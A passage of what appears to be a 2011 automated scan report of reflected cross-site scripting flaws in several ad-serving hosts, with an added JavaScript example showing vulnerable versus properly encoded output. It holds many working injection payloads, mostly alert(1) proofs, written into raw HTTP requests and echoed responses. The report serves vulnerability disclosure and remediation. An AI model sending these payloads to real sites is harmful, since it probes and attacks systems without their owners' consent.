User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 19:18:16 GMT
Pragma: no-cache
Content-Length: 4638
Age: 0
Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1&Z=120x600&s=681714&_salt=272437912";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr ...[SNIP]...
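The remediation detail above says to avoid echoing user data into a script context, and the response shows what goes wrong when a double-quoted string is built by concatenation: rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1..." parses as one string, minus alert(1), minus another string. The block below is an added example, not code from ad.reduxmedia.com or any other server in this report. It renders the two sink shapes seen here (the rm_url string above, and the SRC="..." attribute of the /adi/dmd.ehow responses) first the vulnerable way and then with the output encoding each context needs, and runs the generated script under a recording alert() so the difference is observable rather than asserted. Parameter names follow the requests above; the hosts ad.example and tags.example and all function names are assumptions.

```javascript
'use strict';
// Two sinks from this report, rendered server-side the vulnerable way and the hardened way:
//   sink 1: a request parameter concatenated into a double-quoted JavaScript string inside
//           <script> (the rm_url = "..." sink in the ad.reduxmedia.com response above);
//   sink 2: a request parameter concatenated into a double-quoted HTML attribute
//           (the SRC="..." sink in the ad.doubleclick.net /adi/dmd.ehow responses).
// Added example, not code from any server in the report. Parameter names follow the
// requests above; ad.example, tags.example and the function names are assumptions.

// Output encoder for data inside a JavaScript string literal that lives in an HTML page.
// JSON.stringify escapes quotes, backslashes and control characters. The extra replacements
// keep a literal "</script>" or "<!--" in the data from ending the script block (the HTML
// parser finds the end of <script> before JavaScript ever sees the string) and keep
// U+2028/U+2029, which JSON allows raw but older JS engines reject inside a literal, out of the source.
function jsStringEncode(value) {
  return JSON.stringify(String(value)).slice(1, -1)   // drop JSON's quotes; the template writes its own
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}

// Output encoder for data inside a quoted HTML attribute value.
function htmlAttrEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Sink 1, vulnerable: raw concatenation, the shape of the rm_url sink. A parameter name of
// 6cc2b"-alert(1)-"605cd6b88a5 turns the assignment into "..." - alert(1) - "...".
function renderScriptVulnerable(p) {
  return '<script>var rm_url = "http://ad.example/imp?' + p.name + '=1&Z=' + p.Z + '&s=' + p.s + '";</script>';
}

// Sink 1, hardened: the finished string is encoded for the JS-string context it is written
// into. Percent-encoding the query values when the URL is built is a separate, additional
// step and not a substitute: the sink is a JavaScript string, not a URL, and is encoded as one.
function renderScriptHardened(p) {
  const url = 'http://ad.example/imp?' + p.name + '=1&Z=' + p.Z + '&s=' + p.s;
  return '<script>var rm_url = "' + jsStringEncode(url) + '";</script>';
}

// Sink 2, vulnerable and hardened: a site code concatenated into a SRC attribute.
function renderTagVulnerable(siteCode) {
  return '<script src="http://tags.example/st?ad_size=300x250&site_code=' + siteCode + '"></script>';
}
function renderTagHardened(siteCode) {
  const src = 'http://tags.example/st?ad_size=300x250&site_code=' + siteCode;
  return '<script src="' + htmlAttrEncode(src) + '"></script>';
}

// Harness for sink 1: run the generated script body with a recording alert().
function executeScript(html) {
  const body = /<script>([\s\S]*?)<\/script>/.exec(html)[1];
  const alerts = [];
  const rm_url = new Function('alert', body + '\nreturn rm_url;')(x => alerts.push(x));
  return { rm_url, alerts };
}

// Harness for sink 2: the src attribute value as an HTML parser would delimit it.
function srcAttribute(html) {
  return /src="([^"]*)"/.exec(html)[1];
}

if (typeof require !== 'undefined' && require.main === module) {
  const probe = { name: '6cc2b"-alert(1)-"605cd6b88a5', Z: '120x600', s: '681714' };
  console.log(executeScript(renderScriptVulnerable(probe)));   // alerts: [1], rm_url: NaN
  console.log(executeScript(renderScriptHardened(probe)));     // alerts: [], rm_url: the literal URL
  const code = 'computers6f361"><script>alert(1)</script>7e001703d00';
  console.log(srcAttribute(renderTagVulnerable(code)));         // truncated at the injected quote
  console.log(srcAttribute(renderTagHardened(code)));           // whole value, entity-encoded
}
```

The encoder is chosen by the context the data is written into, not by the data: the same site code needs htmlAttrEncode in the SRC attribute and jsStringEncode if it were written into the script block, and a value that passes through both (an attribute holding inline JavaScript) needs both, innermost first. The cleanest way to follow the remediation advice literally is to keep data out of script text altogether: write it into a data- attribute with htmlAttrEncode and have static JavaScript read it from the DOM.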
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9973'-alert(1)-'b683290dc0 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250b9973'-alert(1)-'b683290dc0&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 402
Connection: close
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe80'-alert(1)-'f0f512ee374 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250&s=601669abe80'-alert(1)-'f0f512ee374&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 404
Connection: close
The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2d'-alert(1)-'7ba8e3efc79 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250dce2d'-alert(1)-'7ba8e3efc79&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close
The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a927c"><script>alert(1)</script>8783e6815d8 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250a927c"><script>alert(1)</script>8783e6815d8&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close
The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9583"><script>alert(1)</script>2bc6827f86d was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250&section=601669a9583"><script>alert(1)</script>2bc6827f86d HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close
The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f734e'-alert(1)-'2b959f792a9 was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250&section=601669f734e'-alert(1)-'2b959f792a9 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219c9'-alert(1)-'d6a336d9756 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:49 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683569:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 848
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fu ...[SNIP]...
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad93'-alert(1)-'3d320c11be8 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:40 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34426:1296683560:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:40 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 852
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58c87'-alert(1)-'b77056dfb54 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:17 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683597:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.writ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b1e'-alert(1)-'97331fa72cc was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:35 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683615:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec678'-alert(1)-'8c695f1ae57 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:26 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683606:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:26 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9848'-alert(1)-'5b0c6c829a2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:08 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683588:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() {
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 304f9'-alert(1)-'df9bcca7015 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
